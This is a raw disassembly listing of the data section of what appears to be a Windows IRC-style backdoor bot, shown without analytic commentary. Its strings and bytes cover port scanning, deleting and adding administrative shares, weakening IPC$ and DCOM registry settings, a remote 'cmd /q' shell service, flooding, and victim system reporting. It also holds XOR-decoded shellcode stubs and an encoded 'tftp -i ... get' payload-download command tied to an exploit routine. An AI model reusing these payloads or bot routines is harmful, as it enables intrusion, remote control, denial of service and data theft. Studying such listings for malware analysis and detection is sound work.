aM db '[M]',0 ; DATA XREF: sub_412583+2C�o
; sub_412583+57�o
dword_434B90 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4126D1+92�o
aIpSPortDIsOp_0 db ' IP: %s Port: %d is open.',0
align 10h
dd 2 dup(0)
dword_434BC8 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4127D1+41�o
aScanningIpSPor db ' Scanning IP: %s, Port: %d.',0
align 4
dd 3 dup(0)
dword_434C08 dd 1D4C0h ; DATA XREF: sub_41313F+10�r
align 10h
off_434C10 dd offset aIpc ; DATA XREF: sub_412976+1B3�o
; sub_412D63+17A�o
; "IPC$"
align 8
dd offset aAdmin_4 ; "ADMIN$"
align 10h
off_434C20 dd offset dword_434C44 ; DATA XREF: sub_412D63+1E3�o
dd offset dword_434C40
dd offset dword_434C3C
dd offset dword_434C38
dword_434C30 dd 2 dup(0) ; DATA XREF: sub_412976+217�o
dword_434C38 dd 5C3A44h ; DATA XREF: .data:00434C2C�o
dword_434C3C dd 2444h ; DATA XREF: .data:00434C28�o
dword_434C40 dd 5C3A43h ; DATA XREF: .data:00434C24�o
dword_434C44 dd 2443h ; DATA XREF: .data:off_434C20�o
aAdmin_4 db 'ADMIN$',0 ; DATA XREF: .data:00434C18�o
align 10h
aIpc db 'IPC$',0 ; DATA XREF: .data:off_434C10�o
align 4
unk_434C58 db 2 ; DATA XREF: sub_412976+2E5�o
; sub_412D63+2D8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aNetapi32_dllCo db ' Netapi32.dll couldn',27h,'t be loaded.',0
align 4
dd 2 dup(0)
unk_434C9C db 2 ; DATA XREF: sub_412976+2CF�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aNetworkSharesD db ' Network shares deleted.',0
dd 3 dup(0)
unk_434CD8 db 2 ; DATA XREF: sub_412976:loc_412BD8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToDelete db ' Failed to delete ',27h,'%S',27h,' share.',0
align 10h
dd 2 dup(0)
unk_434D18 db 2 ; DATA XREF: sub_412976+25B�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aShareSDeleted_ db ' Share ',27h,'%S',27h,' deleted.',0
dd 2 dup(0)
unk_434D4C db 2 ; DATA XREF: sub_412976:loc_412B45�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToDele_0 db ' Failed to delete ',27h,'%s',27h,' share.',0
align 4
dd 2 dup(0)
unk_434D8C db 2 ; DATA XREF: sub_412976+1C8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aShareSDelete_0 db ' Share ',27h,'%s',27h,' deleted.',0
align 10h
unk_434DC0 db 2 ; DATA XREF: sub_412976:loc_412AA8�o
; sub_412D63:loc_412E91�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aAdvapi32_dllCo db ' Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dd 2 dup(0)
unk_434E04 db 2 ; DATA XREF: sub_412976:loc_412AA1�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToOpenIp db ' Failed to open IPC$ Restriction registry key.',0
align 4
dd 3 dup(0)
unk_434E58 db 2 ; DATA XREF: sub_412976:loc_412A83�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aRestrictedAcce db ' Restricted access to the IPC$ Share.',0
align 4
dd 3 dup(0)
unk_434EA4 db 2 ; DATA XREF: sub_412976+106�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToRestri db ' Failed to restrict access to the IPC$ Share.',0
align 4
dd 3 dup(0)
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_412976+ED�o
; sub_412D63+ED�o
align 10h
unk_434F10 db 2 ; DATA XREF: sub_412976+91�o
; sub_412D63+91�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToOpenDc db ' Failed to open DCOM registry key.',0
align 4
dd 3 dup(0)
dword_434F58 dd 20025B02h, 6573202Dh, 1F727563h, 2D201F65h, 25D0220h
; DATA XREF: sub_412976:loc_4129E3�o
dd 2020BB20h, 4D4F4344h, 73696420h, 656C6261h, 2E64h, 2 dup(0)
unk_434F88 db 2 ; DATA XREF: sub_412976+66�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aDisableDcomFai db ' Disable DCOM failed.',0
align 10h
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_412976+54�o
; sub_412D63+54�o
align 10h
word_434FD0 dw 4Eh ; DATA XREF: sub_412976+38�r
align 4
unk_434FD4 db 2 ; DATA XREF: sub_412D63+2C0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aNetworkSharesA db ' Network shares added.',0
align 4
dd 2 dup(0)
aC db '%c:\',0 ; DATA XREF: sub_412D63+22A�o
align 4
aC_0 db '%c$',0 ; DATA XREF: sub_412D63+219�o
unk_435018 db 2 ; DATA XREF: sub_412D63:loc_412F02�o
; sub_412D63:loc_412FD0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToAddSSh db ' Failed to add ',27h,'%s',27h,' share.',0
align 4
dd 2 dup(0)
unk_435054 db 2 ; DATA XREF: sub_412D63+198�o
; sub_412D63+266�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aShareSAdded_ db ' Share ',27h,'%s',27h,' added.',0
align 10h
dd 2 dup(0)
unk_435088 db 2 ; DATA XREF: sub_412D63:loc_412E8A�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToOpen_0 db ' Failed to open IPC$ restriction registry key.',0
align 10h
dd 3 dup(0)
unk_4350DC db 2 ; DATA XREF: sub_412D63:loc_412E6C�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aUnrestrictedAc db ' Unrestricted access to the IPC$ Share.',0
align 4
dd 3 dup(0)
unk_435128 db 2 ; DATA XREF: sub_412D63+102�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToUnrest db ' Failed to unrestrict access to the IPC$ Share.',0
align 10h
dd 4 dup(0)
dword_435180 dd 20025B02h, 6573202Dh, 1F727563h, 2D201F65h, 25D0220h
; DATA XREF: sub_412D63:loc_412DD0�o
dd 2020BB20h, 4D4F4344h, 616E6520h, 64656C62h, 2Eh, 2 dup(0)
unk_4351B0 db 2 ; DATA XREF: sub_412D63+66�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aEnableDcomFail db ' Enable DCOM failed.',0
dd 2 dup(0)
word_4351E4 dw 59h ; DATA XREF: sub_412D63+38�r
align 4
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: .text:00413242�o
align 10h
aRlogindFailedT db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: .text:004131BD�o
; .text:004131EF�o
db '.',0
align 10h
aRlogindFaile_2 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_413309+AF�o
dd 2 dup(0)
aRlogindFaile_1 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_413309+7E�o
align 4
dd 3 dup(0)
aRlogindFaile_0 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_413309+5C�o
dd 3 dup(0)
aRlogindFaile_3 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_413440+C3�o
align 10h
dd 2 dup(0)
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_413440+8C�o
align 10h
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_41354F+A1�o
dd 3 dup(0)
dword_4353B4 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_413993+C4�o
db 66h, 0B9h
word_4353C2 dw 0FFFFh ; DATA XREF: sub_413993+CC�w
db 80h, 73h, 0Eh
byte_4353C7 db 0FFh ; DATA XREF: sub_413993+D3�w
dd 0F9E243h
dword_4353CC dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_413993+A2�o
db 0B1h
byte_4353D9 db 0FFh ; DATA XREF: sub_413993+AA�w
dw 7380h
db 0Ch
byte_4353DD db 0FFh ; DATA XREF: sub_413993+B0�w
dw 0E243h
dd 0F9h
dword_4353E4 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_4137C0+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_435448 dd 12h ; DATA XREF: sub_4137C0+3D�w
dd 70746674h, 6578652Eh, 20692D20h
aGet_0 db ' get ',0 ; DATA XREF: sub_4137C0+79�o
aJ_0 db 'j',0
db 0E8h
dword_435461 dd 17h ; DATA XREF: sub_4137C0+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_435469 dd 1 ; DATA XREF: sub_4137C0+45�w
byte_43546D db 0, 6Ah, 0 ; DATA XREF: sub_4137C0+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_435477 dd 0FFFFFFEDh ; DATA XREF: sub_4137C0+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h, 0Ch dup(0)
dword_4354D8 dd 20025B02h, 7973202Dh, 1F6E1F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00413B23�o
aDoneWithFloodI db ' Done with flood (%iKB/sec).',0
align 4
dd 2 dup(0)
dword_435514 dd 20025B02h, 7973202Dh, 1F6E1F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_413B9E+27D�o
aSendErrorD_ db ' Send error: <%d>.',0
dd 2 dup(0)
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_413F6C+52�o
dd 0
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_414190+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
dd 0Ah dup(0)
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_414190+192�o
dd 0
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_414190:loc_4142F4�o
align 10h
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_414190+EB�o
dd 0
a2003 db '2003',0 ; DATA XREF: sub_414190+BA�o
align 4
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_4144F1+AB�o
align 10h
off_4356E0 dd offset loc_412F4E ; DATA XREF: sub_4144F1:loc_414565�o
dword_4356E4 dd 4E414Ch ; DATA XREF: sub_4144F1:loc_41455E�o
aDialUp db 'Dial-up',0 ; DATA XREF: sub_4144F1+5B�o
dd 0
aNotConnected db 'Not connected',0 ; DATA XREF: sub_4144F1+48�o
align 4
dword_435704 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_4145E8+493�o
dword_435710 dd 726D655Bh, 5D322D33h, 70786520h, 74696F6Ch, 69206465h
; DATA XREF: sub_4145E8+47F�o
dd 203A2070h, 202C7325h, 0FD6C61E7h, 72FD74FEh, 0FD646CFDh
dd 732520h, 2 dup(0)
dword_435744 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4145E8+3B6�o
aFileNotFoundSS db ' File not found: %s (%s).',0
align 4
dd 2 dup(0)
dword_43577C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh, 0
; DATA XREF: sub_4145E8+399�o
dword_435794 dd 20025B02h, 5845202Dh, 494F4C50h, 20444554h, 5D02202Dh
; DATA XREF: sub_4145E8+33E�o
dd 20BB2002h, 202C7325h, 6E65706Fh, 20676E69h, 7325h, 2 dup(0)
dword_4357C4 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4145E8+15A�o
aFailedToOpenFi db ' Failed to open file: %s.',0
align 4
dd 2 dup(0)
dword_4357FC dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4145E8+6A�o
aErrorSocketFai db ' Error: socket() failed, returned: <%d>.',0
align 4
dd 3 dup(0)
aOctet db 'octet',0 ; DATA XREF: sub_4145E8+F�o
align 10h
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_414D07+10�o
dd 0
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_414F49+51�o
align 10h
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_414F49+35�o
align 10h
unk_4358B0 db 2 ; DATA XREF: .text:loc_4151FF�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 76h, 69h
db 73h ; s
db 69h, 6Ch, 1Fh
db 74h ; t
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 4
dd 3 dup(0)
unk_4358F8 db 2 ; DATA XREF: .text:loc_4151F8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 76h, 69h
db 73h ; s
db 69h, 6Ch, 1Fh
db 74h ; t
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aCouldNotOpenAC db ' Could not open a connection.',0
align 10h
dd 2 dup(0)
dword_435938 dd 20025B02h, 6976202Dh, 1F6C6973h, 2D201F74h, 25D0220h
; DATA XREF: .text:004151E6�o
dd 2020BB20h, 61766E49h, 2064696Ch, 2E4C5255h, 2 dup(0)
unk_435964 db 2 ; DATA XREF: .text:loc_4151D9�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 76h, 69h
db 73h ; s
db 69h, 6Ch, 1Fh
db 74h ; t
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 4
dd 3 dup(0)
dword_4359B8 dd 20025B02h, 6976202Dh, 1F6C6973h, 2D201F74h, 25D0220h
; DATA XREF: .text:004151D2�o
dd 2020BB20h, 204C5255h, 69736976h, 2E646574h, 2 dup(0)
dword_4359E4 dd 2A2F2Ah ; DATA XREF: .text:00415081�o
off_4359E8 dd offset off_427618 ; DATA XREF: .rdata:off_427E48�o
; .rdata:00427F74�o ...
align 10h
a_?avexception@ db '.?AVexception@@',0
off_435A00 dd offset off_427618 ; DATA XREF: .rdata:off_427E60�o
; .rdata:00427EF4�o ...
align 8
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 10h
off_435A20 dd offset off_427618 ; DATA XREF: .rdata:off_427E78�o
; .rdata:00427EBC�o ...
align 8
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
off_435A40 dd offset off_427618 ; DATA XREF: .rdata:off_427F00�o
; .rdata:00427F44�o ...
align 8
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 10h
dword_435A60 dd 173Fh ; DATA XREF: sub_415D9B+D�r
dd 9875h, 9873h
off_435A6C dd offset sub_415E6A ; DATA XREF: sub_4177E0�r
dd offset nullsub_3
dd offset nullsub_3
dword_435A78 dd 1B3Fh ; DATA XREF: sub_415EF3+D�r
dword_435A7C dd 19930520h, 4 dup(0) ; DATA XREF: sub_416395+2�o
; sub_41639E+2�o
dword_435A90 dd 18B8F118h ; DATA XREF: sub_416B0E+4�w sub_416B18�r ...
align 10h
off_435AA0 dd offset sub_41781E ; DATA XREF: sub_417FC6+1C�r
dword_435AA4 dd 2 ; DATA XREF: sub_41D92C+E�r
; sub_41D965+46�r ...
off_435AA8 dd offset off_427618 ; DATA XREF: .rdata:off_427F80�o
; .rdata:00427FBC�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_41DAE9
dd 10h
dword_435AC8 dd 3F8h ; DATA XREF: sub_415D36+5�r
; sub_416ED2+4D�r ...
align 10h
dword_435AD0 dd 14h ; DATA XREF: sub_41997F+2�o
off_435AD4 dd offset aExp ; DATA XREF: sub_41997F:loc_41999C�r
; "exp"
dd 1Dh, 4276E8h, 1Ah, 42F53Ch, 1Bh, 4276E0h, 1Fh, 4276D8h
dd 13h, 4276D0h, 21h, 4276C8h, 0Eh, 4276C0h, 0Dh, 4276B8h
dd 0Fh, 4276B0h, 10h, 4276A8h, 5, 4276A0h, 1Eh, 42769Ch
dd 12h, 427698h, 20h, 427694h, 0Ch, 42768Ch, 0Bh, 427684h
dd 15h, 42767Ch, 1Ch, 427674h, 19h, 42766Ch, 11h, 427664h
dd 18h, 42765Ch, 16h, 427654h, 17h, 42764Ch, 22h, 427648h
dd 23h, 427644h, 24h, 427640h
dbl_435BA8 dq 1.797693134862316e308 ; DATA XREF: sub_4196BA+B7�r
; sub_4196BA:loc_4197A1�r ...
dd 0
dd 0FFF80000h
dbl_435BB8 dq 1.797693134862316e308 ; DATA XREF: sub_4196BA+92�r
; sub_4196BA:loc_419779�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_435BD0 dt 2.3562723457267347066e313 ; DATA XREF: sub_419BCB+D�r
; sub_419BCB+1F�r
align 4
tbyte_435BDC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_419BCB+31�r
align 4
off_435BE8 dd offset sub_41A05F ; DATA XREF: sub_415E82+F�w
; sub_41AAED+3AA�r
off_435BEC dd offset sub_419CF4 ; DATA XREF: sub_415E82+5�w
; sub_41AAED+3E2�r
off_435BF0 dd offset sub_419D5A ; DATA XREF: sub_415E82+14�w
; sub_41B320+430�r
off_435BF4 dd offset sub_419C9A ; DATA XREF: sub_415E82+1E�w
; sub_41AAED+3CB�r
off_435BF8 dd offset sub_419D42 ; DATA XREF: sub_415E82+28�w
off_435BFC dd offset sub_41A05F ; DATA XREF: sub_415E82+32�w
dd offset sub_41DAE9
align 10h
off_435C10 dd offset sub_41A91C ; DATA XREF: .text:0041A972�r
off_435C14 dd offset sub_41A91C ; DATA XREF: sub_41A982+29�r
off_435C18 dd offset aNull ; DATA XREF: sub_41AAED:loc_41AE51�r
; sub_41AAED+457�r
; "(null)"
off_435C1C dd offset aNull_0 ; DATA XREF: sub_41AAED+259�r
; "(null)"
asc_435C20 db ' ',9,'-',0Dh,']',0 ; DATA XREF: sub_41B320:loc_41B887�o
align 4
asc_435C28: ; DATA XREF: sub_41B320:loc_41B777�o
unicode 0, <]>,0
off_435C2C dd offset word_435C36 ; DATA XREF: sub_416C44+23�r
; sub_416C44:loc_416CA5�r ...
dd offset word_435C36
db 2 dup(0)
word_435C36 dw 20h ; DATA XREF: sub_41F7D9+18�r
; .data:off_435C2C�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_435E38 dd 1 ; DATA XREF: sub_416C44:loc_416C4C�r
; sub_416C44:loc_416C90�r ...
byte_435E3C db 2Eh ; DATA XREF: sub_419C9A:loc_419CDA�r
; sub_419CF4+4�r ...
align 10h
dd 1, 0
dword_435E48 dd 1 ; DATA XREF: sub_41C4E8+C�o
dword_435E4C dd 16h ; DATA XREF: sub_41C4E8:loc_41C51D�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
byte_435FB0 db 1 ; DATA XREF: sub_41C4E8+19�o
; sub_41C6E5+E1�r
db 2, 4, 8
align 8
dword_435FB8 dd 3A4h ; DATA XREF: sub_41C6E5+2F�o
dword_435FBC dd 82798260h ; DATA XREF: sub_41C6E5+11D�r
dd 21h, 0
dword_435FC8 dd 0DFA6h ; DATA XREF: sub_41C6E5+C0�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4360A8 dd 0C0000005h ; DATA XREF: sub_41C6E5+3C�o
; sub_41D1AB+A�r ...
dword_4360AC dd 0Bh ; DATA XREF: sub_420445+A�r
dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_436120 dd 3 ; DATA XREF: sub_41D06A+58�r
; sub_420318+C8�r
dword_436124 dd 7 ; DATA XREF: sub_41D06A+5E�r
; sub_420318+CD�r
dword_436128 dd 0Ah ; DATA XREF: sub_41D1AB+4�r
; .text:00420232�r ...
dword_43612C dd 8Ch ; DATA XREF: sub_41D06A+82�r
; sub_41D06A+8F�w ...
dword_436130 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_41A9D8:loc_41AA95�o
; sub_41C031:loc_41C0B2�o
dword_436138 dd 2 ; DATA XREF: sub_41D965+E�o
; sub_41D965+28�r ...
off_43613C dd offset aR6002FloatingP ; DATA XREF: sub_41D965+FC�r
; sub_41D965+12D�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 427A74h, 9, 427A48h, 0Ah, 427A24h, 10h, 4279F8h
dd 11h, 4279C8h, 12h, 4279A4h, 13h, 427978h, 18h, 427940h
dd 19h, 427918h, 1Ah, 4278E0h, 1Bh, 4278A8h, 1Ch, 427880h
dd 78h, 427870h, 79h, 427860h, 7Ah, 427850h, 0FCh, 42BFC0h
dd 0FFh, 427840h
dword_4361C8 dd 2694h ; DATA XREF: sub_419218+3�r
; .text:00419276�r ...
align 10h
dword_4361D0 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_41E0A2�o
dword_4361E8 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_41E0B8�o
off_436200 dd offset dword_492E40 ; DATA XREF: sub_41E5E8+55�o
align 8
dd offset dword_492E40
dd 101h
dword_436210 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41E5E8+72�o
dd 1000h, 0
dword_436220 dd 3 dup(0) ; DATA XREF: sub_41A9D8+50�o
; sub_41CB5F+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_436240 dd 3 dup(0) ; DATA XREF: sub_41A9D8+58�o
; sub_41CB5F:loc_41CB7D�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_436270 dd 84h dup(0) ; DATA XREF: sub_41E5E8+9B�o
dword_436480 dd 7080h ; DATA XREF: sub_41C623+76�r
; sub_41E5E8+69�o ...
dword_436484 dd 1 ; DATA XREF: sub_41C623+98�r
; sub_41F1B2+8B�w ...
dword_436488 dd 0FFFFF1F0h ; DATA XREF: sub_41C623:loc_41C6D5�r
; sub_41F1B2+94�w ...
dword_43648C dd 545350h, 0Fh dup(0) ; DATA XREF: .data:off_43650C�o
dword_4364CC dd 544450h, 0Fh dup(0) ; DATA XREF: .data:off_436510�o
off_43650C dd offset dword_43648C ; DATA XREF: sub_41F1B2+BA�r
; sub_41F1B2+D9�r ...
off_436510 dd offset dword_4364CC ; DATA XREF: sub_41F1B2+F4�r
; sub_41F1B2+11B�r ...
align 8
dword_436518 dd 0FFFFFFFFh ; DATA XREF: sub_41F1B2+1D�w
; sub_41F410+1E�r ...
dword_43651C dd 0 ; DATA XREF: sub_41F410:loc_41F544�r
; sub_41F5BC+BF�w
dword_436520 dd 0 ; DATA XREF: sub_41F410+192�r
; sub_41F5BC+E0�w
align 8
dword_436528 dd 0FFFFFFFFh ; DATA XREF: sub_41F1B2+17�w
; sub_41F410+26�r ...
dword_43652C dd 0 ; DATA XREF: sub_41F410+13A�r
; sub_41F5BC+EA�w ...
dword_436530 dd 0 ; DATA XREF: sub_41F410+1A1�r
; sub_41F5BC+23�r ...
dword_436534 dd 0FFFFFFFFh ; DATA XREF: sub_41F5BC+84�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_436564 dd 16Dh ; DATA XREF: sub_41C623+2A�r
; sub_41F5BC+2E�r ...
dword_436568 dd 0FFFFFFFFh ; DATA XREF: sub_41F5BC:loc_41F648�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_4365A0 dd 2 dup(0) ; DATA XREF: sub_420942+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
